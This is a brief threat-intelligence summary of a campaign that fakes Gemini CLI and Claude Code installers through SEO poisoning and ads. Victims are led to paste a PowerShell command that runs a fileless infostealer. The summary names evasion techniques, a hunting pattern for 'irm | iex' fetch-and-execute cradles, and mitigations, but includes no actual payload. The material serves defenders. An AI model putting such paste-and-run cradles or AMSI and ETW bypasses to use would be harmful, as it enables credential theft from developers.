Hackers Use SEO Poisoning to Fake Gemini CLI, Claude Installers

Financially motivated actors are impersonating popular AI developer tools (Gemini CLI and Claude Code) using SEO poisoning, typosquatted domains, and paid Google Ads to trick developers into pasting a single PowerShell command; that command executes a dual-stage, fileless PowerShell infostealer that disables ETW, bypasses AMSI, performs anti-sandbox checks, and harvests browser credentials, session tokens (allowing MFA bypass), SSH keys, CI/CD credentials and cloud-synced data across multiple sectors and regions. The report includes numerous IOCs (domains, an IP, and payload hosts), detection/hunting guidance (look for irm | iex cradles and hidden PowerShell invocation), and recommended mitigations such as PowerShell constrained language mode, WDAC/AppLocker, FIDO2 enforcement, and developer paste-and-execute training.